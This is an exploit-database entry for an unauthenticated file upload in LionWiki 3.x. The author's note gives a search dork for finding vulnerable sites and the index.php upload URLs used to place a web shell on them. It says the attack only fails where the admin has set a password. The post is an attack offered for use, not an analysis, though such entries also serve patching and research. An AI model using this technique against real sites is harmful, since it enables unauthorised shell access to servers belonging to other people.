LionWiki 3.x - 'index.php' Arbitrary File Upload

EDB-ID:

12075

CVE:

N/A

Author:

ayastar

Type:

webapps

Platform:

PHP

Published:

2010-04-05

# Exploit Title: LionWiki 3.X (index.php) upload shell
# Date: monday 05 april 2010
# Author: ayastar
# Software Link: http://lionwiki.0o.cz
# Version: 3.X
# Tested on: ubuntu 9.10 (english )
# CVE : [yes]
# Code : [exploit code]

hi brother's and all muslims
this is my first bug :)

dork : "powered by LionWiki "

exploit :

http://victim/path/index.php?action=upload
http://victim.com/path/?action=upload


ah (note)" you can't upload you're shell code if admin create password "

contacte my in
dmx-ayastar@hotmail.fr


cretz for alah and  all muslims and all hacker and all tryagian ( ayastar) :)